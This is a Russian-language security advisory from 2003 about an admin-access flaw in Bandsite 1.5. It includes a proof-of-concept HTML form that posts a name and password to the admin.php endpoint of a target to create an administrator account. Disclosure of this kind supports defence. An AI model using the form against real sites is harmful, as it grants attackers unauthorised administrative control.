Удаленный административный доступ к Bandsite

Дата публикации:
16.09.2003
Всего просмотров:
769
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:

Уязвимые версии: Bandsite 1.5

Описание: Уязвимость обнаружена в Bandsite. Удаленный атакующий может получить административный доступ к приложению.

Удаленный пользователь может представить специально обработанный POST запрос к следующему URL, чтобы добавить учетную запись пользователя с административными привилегиями.

http://[target]/bandwebsite/admin.php?&Login=1§ion=admins

Пример/Эксплоит: <TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
<TBODY>
<tr><td bgcolor=#ffffff>
&nbsp;</p>
<p>
<form
action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins
method=post>
Name:<br>
<input type=text name='name' value='nmsh' size="20"><br>
Pass:<br>
<input type=text name='pass' value='nmsh' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form></TD></TR></TBODY></TABLE>
<P><BR></P></TD></TR></TBODY></TABLE></BODY>

URL производителя: http://membres.lycos.fr/fluxx/bandwebsite.php

Решение:

Способов устранения обнаруженной уязвимости не существует в настоящее время. Используйте альтернативное программное обеспечение.

Ссылки: vulnerability in Bandsite Allows Gaining Admin Access.
или введите имя

CAPTCHA